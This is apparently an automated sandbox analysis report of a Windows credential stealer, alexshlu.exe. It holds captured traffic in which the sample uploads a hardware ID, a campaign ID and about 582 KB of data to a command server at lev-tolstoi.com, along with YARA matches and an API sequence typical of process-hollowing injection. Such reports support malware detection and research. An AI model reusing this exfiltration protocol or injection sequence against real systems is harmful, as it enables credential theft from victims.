2024-12-18 11:08:30 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 11:08:30 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.8  49714        172.67.157.254  443               7720  C:\Users\user\Desktop\alexshlu.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 11:08:32 UTC  271                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=XRK0RM6J3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1171
Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 11:08:32 UTC1171OUTData Raw: 2d 2d 58 52 4b 30 52 4d 36 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 45 46 32 37 43 41 33 45 41 42 44 36 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 58 52 4b 30 52 4d 36 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 52 4b 30 52 4d 36 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72 0d 0a 2d 2d 58 52 4b 30 52 4d 36 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                      Data Ascii: --XRK0RM6J3Content-Disposition: form-data; name="hwid"3DEF27CA3EABD68D23D904AF30EFEBBC--XRK0RM6J3Content-Disposition: form-data; name="pid"1--XRK0RM6J3Content-Disposition: form-data; name="lid"FATE99--november--XRK0RM6J3Content-D
                                                                                                                                                                                                                                      2024-12-18 11:08:32 UTC1043INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 11:08:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=makmbhvo3r6f6lt5tu8g5u6qq2; expires=Sun, 13-Apr-2025 04:55:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z2hXMQrl%2BxJLQ4gVr3HmXSW0eb%2FWWH%2BVK1lNeF%2FTHP%2BZTpJRovpZ2h%2B6I%2F3S54262UdEpBKpnD7Jd22KAv58r6KtzxlyYP6M98DoaBNr3i5ZFBm3AeOQ92spXPseWXfGkfc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3eb20e79ea427c-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2176&min_rtt=2173&rtt_var=822&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2078&delivery_rate=1326669&cwnd=245&unsent_bytes=0&cid=5da8744880e0acd1&ts=756&x=0"
                                                                                                                                                                                                                                      2024-12-18 11:08:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                      2024-12-18 11:08:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49715 | 172.67.157.254 | 443 | 7720 | C:\Users\user\Desktop\alexshlu.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 11:08:34 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=2CZLVT98GDNSWI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 582063
Host: lev-tolstoi.com
2024-12-18 11:08:34 UTC | 15331 | OUT | Data Raw: 2d 2d 32 43 5a 4c 56 54 39 38 47 44 4e 53 57 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 45 46 32 37 43 41 33 45 41 42 44 36 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 32 43 5a 4c 56 54 39 38 47 44 4e 53 57 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 43 5a 4c 56 54 39 38 47 44 4e 53 57 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72 0d 0a 2d 2d 32 43 5a 4c 56
Data Ascii: --2CZLVT98GDNSWIContent-Disposition: form-data; name="hwid"3DEF27CA3EABD68D23D904AF30EFEBBC--2CZLVT98GDNSWIContent-Disposition: form-data; name="pid"1--2CZLVT98GDNSWIContent-Disposition: form-data; name="lid"FATE99--november--2CZLV
2024-12-18 11:08:39 UTC | 1042 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 11:08:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=9ti2nhd1sh1pc87k2a6000hq58; expires=Sun, 13-Apr-2025 04:55:16 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2uhY7KoS4waAzTdr6XzYgxGZJuXaWWRz6tBQRCeo22rsbDEEl17bcopdooqxkIMHpNwZQvs3G%2FRg4m78DfvagKVEmyit1vXqmxWgXYtcDTEgdj9b%2BqvJ0R%2BjgdNBwSIG9z4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3eb21e2cea7cea-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1947&min_rtt=1940&rtt_var=743&sent=367&recv=611&lost=0&retrans=0&sent_bytes=2834&recv_bytes=584627&delivery_rate=1457813&cwnd=226&unsent_bytes=0&cid=cda6a2ce585dae91&ts=4688&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49716 | 172.67.157.254 | 443 | 7720 | C:\Users\user\Desktop\alexshlu.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 11:08:40 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 85
Host: lev-tolstoi.com
2024-12-18 11:08:40 UTC | 85 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72 26 6a 3d 26 68 77 69 64 3d 33 44 45 46 32 37 43 41 33 45 41 42 44 36 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43
Data Ascii: act=get_message&ver=4.0&lid=FATE99--november&j=&hwid=3DEF27CA3EABD68D23D904AF30EFEBBC
2024-12-18 11:08:41 UTC | 1043 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 11:08:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=5i7gen8b9knl7o2ac17ngkk2bt; expires=Sun, 13-Apr-2025 04:55:20 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KicTcL3BqP1d9phBh1jNjsBQNmhtB4MGNz16VjldU7K8zxVpLfxsO0X%2F06VTZzNxCMx%2BVL6foz8ME0Hi%2BAWcookSxX3auOA9dwW%2BS%2Bg%2FhgG9MCXWMIh9d8KB2r%2BuTNv4RDM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3eb2440f18423f-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2793&min_rtt=1869&rtt_var=1361&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=984&delivery_rate=1562332&cwnd=237&unsent_bytes=0&cid=20437e5482be7f0a&ts=720&x=0"
                                                                                                                                                                                                                                      2024-12-18 11:08:41 UTC54INData Raw: 33 30 0d 0a 68 6d 39 79 6f 30 35 48 37 31 35 74 2b 67 6f 4d 70 44 73 62 76 70 77 51 6a 70 49 4e 62 64 6d 79 6b 62 53 78 52 59 63 4c 5a 61 58 64 4d 67 3d 3d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 30hm9yo05H715t+goMpDsbvpwQjpINbdmykbSxRYcLZaXdMg==
                                                                                                                                                                                                                                      2024-12-18 11:08:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0



Target ID: 0
Start time: 06:08:00
Start date: 18/12/2024
Path: C:\Users\user\Desktop\alexshlu.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\alexshlu.exe"
Imagebase: 0x2a0000
File size: 828'416 bytes
MD5 hash: 9821FA45714F3B4538CC017320F6F7E5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 06:08:00
Start date: 18/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 06:08:00
Start date: 18/12/2024
Path: C:\Users\user\Desktop\alexshlu.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\alexshlu.exe"
Imagebase: 0x2a0000
File size: 828'416 bytes
MD5 hash: 9821FA45714F3B4538CC017320F6F7E5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1669509041.0000000000CF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 4.1%
Dynamic/Decrypted Code Coverage: 1.2%
Signature Coverage: 8.5%
Total number of Nodes: 655
Total number of Limit Nodes: 9
execution_graph: node/edge listing of the interactive Execution Graph (655 nodes, 9 limit nodes; the raw listing is omitted here). API calls recoverable from the graph nodes include CRT start-up and exception handling (GetModuleFileNameW, GetLastError, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, HeapFree, RtlAllocateHeap, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, GetCommandLineA, GetCommandLineW, GetProcessHeap, DecodePointer, LCMapStringEx, GetStringTypeW), dynamic import resolution (GetModuleHandleW, GetProcAddress), file and console handling from node 2a1b70 (GetPEB, CreateFileA, GetFileSize, ReadFile, CloseHandle, FreeConsole, VirtualProtect, RaiseException, FreeLibrary), and the sequence in node 2d61a9: GetPEB, CreateProcessW, VirtualAlloc, Wow64GetThreadContext, ReadProcessMemory, VirtualAllocEx, WriteProcessMemory (three calls), Wow64SetThreadContext, ResumeThread.
20470 2b6c37 20470->20383 20471->20384 20472->20377 20474->20462 20475->20462 20476->20467 20477->20470 20478->20403 20479->20409 20489 2b770f 20481->20489 20483 2aa876 20483->20419 20484->20414 20486 2b7f4d _Fputc 20485->20486 20635 2b811b 20486->20635 20488 2b7f62 _Fputc 20488->20419 20490 2b7722 _Fputc 20489->20490 20493 2b7770 20490->20493 20492 2b7731 _Fputc 20492->20483 20494 2b777c ___scrt_is_nonwritable_in_current_image 20493->20494 20495 2b77a9 20494->20495 20496 2b7785 20494->20496 20509 2b13a4 EnterCriticalSection 20495->20509 20515 2b6aa5 29 API calls 2 library calls 20496->20515 20499 2b77b2 20508 2b77c7 20499->20508 20516 2be079 20499->20516 20500 2b779e _Fputc 20500->20492 20502 2b7833 20523 2b6aa5 29 API calls 2 library calls 20502->20523 20503 2b7864 20510 2b7743 20503->20510 20506 2b7870 20524 2b789c LeaveCriticalSection __fread_nolock 20506->20524 20508->20502 20508->20503 20509->20499 20511 2b7762 20510->20511 20512 2b7751 20510->20512 20511->20506 20525 2c3363 20512->20525 20514 2b775d 20514->20506 20515->20500 20517 2be09a 20516->20517 20518 2be085 20516->20518 20517->20508 20633 2b6211 14 API calls __strnicoll 20518->20633 20520 2be08a 20634 2b68fc 29 API calls __strnicoll 20520->20634 20522 2be095 20522->20508 20523->20500 20524->20500 20526 2c33fe 20525->20526 20527 2be079 __fread_nolock 29 API calls 20526->20527 20529 2c340b 20527->20529 20528 2c3417 20528->20514 20529->20528 20530 2c3463 20529->20530 20549 2c3379 31 API calls _Fputc 20529->20549 20530->20528 20537 2c34c5 20530->20537 20550 2bd0ab 20530->20550 20534 2c34b8 20534->20537 20557 2c538f 14 API calls 2 library calls 20534->20557 20538 2c35ee 20537->20538 20539 2be079 __fread_nolock 29 API calls 20538->20539 20540 2c35fd 20539->20540 20541 2c3610 20540->20541 20542 2c36a3 20540->20542 20544 2c362d 20541->20544 20547 2c3654 20541->20547 20558 2c273c 20542->20558 20545 2c273c _Fputc 64 API calls 20544->20545 20546 2c34d6 20545->20546 20546->20514 20547->20546 20569 2c1250 33 API 
calls _Fputc 20547->20569 20549->20530 20551 2bd0b7 _Fputc 20550->20551 20552 2bd0e1 20551->20552 20553 2be079 __fread_nolock 29 API calls 20551->20553 20552->20534 20554 2bd0d2 20553->20554 20621 2c6024 20554->20621 20556 2bd0d8 20556->20534 20557->20537 20560 2c2748 ___scrt_is_nonwritable_in_current_image 20558->20560 20559 2c2750 20559->20546 20560->20559 20561 2c2789 20560->20561 20563 2c27cf 20560->20563 20599 2b6aa5 29 API calls 2 library calls 20561->20599 20570 2c2196 EnterCriticalSection 20563->20570 20565 2c27d5 20566 2c27f3 20565->20566 20571 2c2520 20565->20571 20600 2c2845 LeaveCriticalSection __fread_nolock 20566->20600 20569->20546 20570->20565 20572 2c2548 20571->20572 20596 2c256b __fread_nolock 20571->20596 20573 2c254c 20572->20573 20575 2c25a7 20572->20575 20615 2b6aa5 29 API calls 2 library calls 20573->20615 20576 2c25c5 20575->20576 20616 2c12d0 31 API calls __fread_nolock 20575->20616 20601 2c284d 20576->20601 20580 2c25dd 20584 2c260c 20580->20584 20589 2c25e5 20580->20589 20581 2c2624 20582 2c268d WriteFile 20581->20582 20583 2c2638 20581->20583 20585 2c26af GetLastError 20582->20585 20598 2c261f 20582->20598 20587 2c2679 20583->20587 20588 2c2640 20583->20588 20618 2c28ca 45 API calls 4 library calls 20584->20618 20585->20598 20608 2c2cf9 20587->20608 20590 2c2665 20588->20590 20591 2c2645 20588->20591 20589->20596 20617 2c2c91 6 API calls _Fputc 20589->20617 20620 2c2ebd 8 API calls 2 library calls 20590->20620 20594 2c264e 20591->20594 20591->20596 20619 2c2dd4 7 API calls 2 library calls 20594->20619 20596->20566 20598->20596 20599->20559 20600->20559 20602 2c6024 __fread_nolock 29 API calls 20601->20602 20604 2c285f 20602->20604 20603 2c25d7 20603->20580 20603->20581 20604->20603 20605 2b1840 _Fputc 39 API calls 20604->20605 20606 2c288d 20604->20606 20605->20606 20606->20603 20607 2c28a7 GetConsoleMode 20606->20607 20607->20603 20612 2c2d08 _Fputc 20608->20612 20609 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20610 
2c2dd2 20609->20610 20610->20596 20611 2c2d78 WriteFile 20611->20612 20613 2c2dbb GetLastError 20611->20613 20612->20611 20614 2c2db9 20612->20614 20613->20614 20614->20609 20615->20596 20616->20576 20617->20596 20618->20598 20619->20596 20620->20598 20622 2c603e 20621->20622 20623 2c6031 20621->20623 20626 2c604a 20622->20626 20631 2b6211 14 API calls __strnicoll 20622->20631 20630 2b6211 14 API calls __strnicoll 20623->20630 20625 2c6036 20625->20556 20626->20556 20628 2c606b 20632 2b68fc 29 API calls __strnicoll 20628->20632 20630->20625 20631->20628 20632->20625 20633->20520 20634->20522 20636 2b8129 20635->20636 20637 2b8151 20635->20637 20636->20637 20638 2b8158 20636->20638 20639 2b8136 20636->20639 20637->20488 20643 2b81de 20638->20643 20651 2b6aa5 29 API calls 2 library calls 20639->20651 20644 2b81ea ___scrt_is_nonwritable_in_current_image 20643->20644 20652 2b13a4 EnterCriticalSection 20644->20652 20646 2b81f8 20653 2b8192 20646->20653 20650 2b8190 20650->20488 20651->20637 20652->20646 20661 2bd000 20653->20661 20660 2b822d LeaveCriticalSection __fread_nolock 20660->20650 20662 2bd0ab _Fputc 29 API calls 20661->20662 20663 2bd011 _Fputc 20662->20663 20667 2b81aa 20663->20667 20682 2ba8d1 20663->20682 20666 2ba897 ___free_lconv_mon 14 API calls 20666->20667 20668 2b7f74 20667->20668 20671 2b7f86 20668->20671 20672 2b7faf 20668->20672 20669 2b7f94 20691 2b6aa5 29 API calls 2 library calls 20669->20691 20671->20669 20671->20672 20677 2b7fca codecvt 20671->20677 20678 2bd0e9 20672->20678 20673 2c3363 _Fputc 66 API calls 20673->20677 20675 2be079 __fread_nolock 29 API calls 20675->20677 20676 2c273c _Fputc 64 API calls 20676->20677 20677->20672 20677->20673 20677->20675 20677->20676 20692 2b70cb 20677->20692 20679 2bd0f4 20678->20679 20681 2b81d4 20678->20681 20680 2b70cb ___scrt_uninitialize_crt 64 API calls 20679->20680 20679->20681 20680->20681 20681->20660 20683 2ba90f 20682->20683 20687 2ba8df __strnicoll 20682->20687 20690 2b6211 14 API calls 
__strnicoll 20683->20690 20685 2ba8fa RtlAllocateHeap 20686 2ba90d 20685->20686 20685->20687 20686->20666 20687->20683 20687->20685 20689 2b439c EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20687->20689 20689->20687 20690->20686 20691->20672 20693 2b70e4 20692->20693 20697 2b710b 20692->20697 20694 2be079 __fread_nolock 29 API calls 20693->20694 20693->20697 20695 2b7100 20694->20695 20696 2c273c _Fputc 64 API calls 20695->20696 20696->20697 20697->20677 20698->20435 20699->20445 20700->20454 20701->20452 20786 2ae3f0 20787 2ae3fc ___scrt_is_nonwritable_in_current_image 20786->20787 20812 2a9a58 20787->20812 20789 2ae403 20790 2ae55c 20789->20790 20800 2ae42d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 20789->20800 20861 2ad86f 4 API calls 2 library calls 20790->20861 20792 2ae563 20862 2b406a 21 API calls CallUnexpected 20792->20862 20794 2ae569 20863 2b4080 21 API calls CallUnexpected 20794->20863 20796 2ae571 20797 2ae44c 20798 2ae4cd 20823 2b65e9 59 API calls 20798->20823 20800->20797 20800->20798 20857 2b40b4 39 API calls 4 library calls 20800->20857 20802 2ae4d3 20824 2a20d0 GetModuleHandleW GetModuleFileNameA 20802->20824 20806 2ae4f4 20806->20792 20807 2ae4f8 20806->20807 20808 2ae501 20807->20808 20859 2b4096 21 API calls CallUnexpected 20807->20859 20860 2a9a91 75 API calls ___scrt_uninitialize_crt 20808->20860 20811 2ae50a 20811->20797 20813 2a9a61 20812->20813 20864 2ad4db IsProcessorFeaturePresent 20813->20864 20815 2a9a6d 20865 2aed89 10 API calls 2 library calls 20815->20865 20817 2a9a72 20818 2a9a76 20817->20818 20866 2b12bf 20817->20866 20818->20789 20821 2a9a8d 20821->20789 20823->20802 20825 2a97fb std::ios_base::_Init 3 API calls 20824->20825 20826 2a2106 20825->20826 20827 2a97fb std::ios_base::_Init 3 API calls 20826->20827 20828 2a2112 20827->20828 20879 2b3e7d 20828->20879 20830 2a2133 20831 2a21fc 20830->20831 20833 2a214a GetCurrentThreadId 20830->20833 20834 2a21e7 20830->20834 
20899 2aa1d4 30 API calls 2 library calls 20831->20899 20836 2a21ee 20833->20836 20837 2a2157 20833->20837 20896 2aa1d4 30 API calls 2 library calls 20834->20896 20835 2a2209 20900 2aa1d4 30 API calls 2 library calls 20835->20900 20897 2aa1d4 30 API calls 2 library calls 20836->20897 20894 2ad0b6 WaitForSingleObjectEx GetExitCodeThread CloseHandle 20837->20894 20842 2a21f5 20898 2aa1d4 30 API calls 2 library calls 20842->20898 20845 2a2163 20845->20842 20846 2a97fb std::ios_base::_Init 3 API calls 20845->20846 20847 2a217e 20846->20847 20848 2b3e7d 49 API calls 20847->20848 20849 2a219d 20848->20849 20849->20834 20849->20835 20850 2a21af GetCurrentThreadId 20849->20850 20850->20836 20851 2a21b8 20850->20851 20895 2ad0b6 WaitForSingleObjectEx GetExitCodeThread CloseHandle 20851->20895 20853 2a21c7 20853->20842 20854 2a21ce 20853->20854 20855 2a986f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20854->20855 20856 2a21dc 20855->20856 20858 2ad81c GetModuleHandleW 20856->20858 20857->20798 20858->20806 20859->20808 20860->20811 20861->20792 20862->20794 20863->20796 20864->20815 20865->20817 20870 2bcc5e 20866->20870 20869 2aeda8 7 API calls 2 library calls 20869->20818 20871 2bcc6e 20870->20871 20872 2a9a7f 20870->20872 20871->20872 20874 2bc3d2 20871->20874 20872->20821 20872->20869 20876 2bc3d9 20874->20876 20875 2bc41c GetStdHandle 20875->20876 20876->20875 20877 2bc47e 20876->20877 20878 2bc42f GetFileType 20876->20878 20877->20871 20878->20876 20880 2b3e8a 20879->20880 20881 2b3e9e 20879->20881 20910 2b6211 14 API calls __strnicoll 20880->20910 20901 2b3f0e 20881->20901 20884 2b3e8f 20911 2b68fc 29 API calls __strnicoll 20884->20911 20887 2b3eb3 CreateThread 20889 2b3ed2 GetLastError 20887->20889 20892 2b3ede 20887->20892 20921 2b3f95 20887->20921 20888 2b3e9a 20888->20830 20912 2b6237 14 API calls 2 library calls 20889->20912 20913 2b3f5e 20892->20913 20894->20845 20895->20853 20902 2bbc50 __strnicoll 14 API calls 20901->20902 20903 2b3f1f 20902->20903 
20904 2ba897 ___free_lconv_mon 14 API calls 20903->20904 20905 2b3f2c 20904->20905 20906 2b3f33 GetModuleHandleExW 20905->20906 20907 2b3f50 20905->20907 20906->20907 20908 2b3f5e 16 API calls 20907->20908 20909 2b3eaa 20908->20909 20909->20887 20909->20892 20910->20884 20911->20888 20912->20892 20914 2b3f6a 20913->20914 20920 2b3ee9 20913->20920 20915 2b3f79 20914->20915 20916 2b3f70 CloseHandle 20914->20916 20917 2b3f88 20915->20917 20918 2b3f7f FreeLibrary 20915->20918 20916->20915 20919 2ba897 ___free_lconv_mon 14 API calls 20917->20919 20918->20917 20919->20920 20920->20830 20922 2b3fa1 ___scrt_is_nonwritable_in_current_image 20921->20922 20923 2b3fa8 GetLastError ExitThread 20922->20923 20924 2b3fb5 20922->20924 20935 2bab23 GetLastError 20924->20935 20929 2b3fd1 20967 2b3f00 17 API calls 20929->20967 20936 2bab39 20935->20936 20937 2bab3f 20935->20937 20968 2bb53b 6 API calls std::_Locinfo::_Locinfo_dtor 20936->20968 20941 2bab43 SetLastError 20937->20941 20969 2bb57a 6 API calls std::_Locinfo::_Locinfo_dtor 20937->20969 20940 2bab5b 20940->20941 20943 2bbc50 __strnicoll 14 API calls 20940->20943 20944 2babd8 20941->20944 20945 2b3fba 20941->20945 20946 2bab70 20943->20946 20974 2b6e66 39 API calls CallUnexpected 20944->20974 20962 2be0dc 20945->20962 20948 2bab89 20946->20948 20949 2bab78 20946->20949 20971 2bb57a 6 API calls std::_Locinfo::_Locinfo_dtor 20948->20971 20970 2bb57a 6 API calls std::_Locinfo::_Locinfo_dtor 20949->20970 20953 2bab95 20955 2bab99 20953->20955 20956 2babb0 20953->20956 20954 2bab86 20958 2ba897 ___free_lconv_mon 14 API calls 20954->20958 20972 2bb57a 6 API calls std::_Locinfo::_Locinfo_dtor 20955->20972 20973 2bae34 14 API calls __strnicoll 20956->20973 20958->20941 20960 2babbb 20961 2ba897 ___free_lconv_mon 14 API calls 20960->20961 20961->20941 20963 2be0ec CallUnexpected 20962->20963 20964 2b3fc5 20962->20964 20963->20964 20975 2bb830 20963->20975 20964->20929 20966 2bb787 5 API calls std::_Locinfo::_Locinfo_dtor 20964->20966 
20966->20929 20968->20937 20969->20940 20970->20954 20971->20953 20972->20954 20973->20960 20978 2bb97d 20975->20978 20979 2bb9ad 20978->20979 20983 2bb84c 20978->20983 20979->20983 20985 2bb8b2 20979->20985 20982 2bb9c7 GetProcAddress 20982->20983 20984 2bb9d7 std::_Locinfo::_Locinfo_dtor 20982->20984 20983->20964 20984->20983 20986 2bb8c3 ___vcrt_FlsGetValue 20985->20986 20987 2bb959 20986->20987 20988 2bb8e1 LoadLibraryExW 20986->20988 20992 2bb92f LoadLibraryExW 20986->20992 20987->20982 20987->20983 20989 2bb8fc GetLastError 20988->20989 20990 2bb960 20988->20990 20989->20986 20990->20987 20991 2bb972 FreeLibrary 20990->20991 20991->20987 20992->20986 20992->20990 21058 2bc2f0 15 API calls 21138 2ab7f5 72 API calls error_info_injector 21059 2a96cf 47 API calls 2 library calls 21141 2b13cc 15 API calls 2 library calls 21146 2a3dc0 72 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 21148 2a9fc4 9 API calls 3 library calls 21151 2ae3de 30 API calls 21065 2baadd 16 API calls __strnicoll 21066 2a6cd0 99 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 21153 2a85d0 48 API calls

Control-flow Graph

APIs
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,002D611B,002D610B), ref: 002D633F
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 002D6352
• Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 002D6370
• ReadProcessMemory.KERNELBASE(0000012C,?,002D615F,00000004,00000000), ref: 002D6394
• VirtualAllocEx.KERNELBASE(0000012C,?,?,00003000,00000040), ref: 002D63BF
• WriteProcessMemory.KERNELBASE(0000012C,00000000,?,?,00000000,?), ref: 002D6417
• WriteProcessMemory.KERNELBASE(0000012C,00400000,?,?,00000000,?,00000028), ref: 002D6462
• WriteProcessMemory.KERNELBASE(0000012C,?,?,00000004,00000000), ref: 002D64A0
• Wow64SetThreadContext.KERNEL32(00000088,00AF0000), ref: 002D64DC
• ResumeThread.KERNELBASE(00000088), ref: 002D64EB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
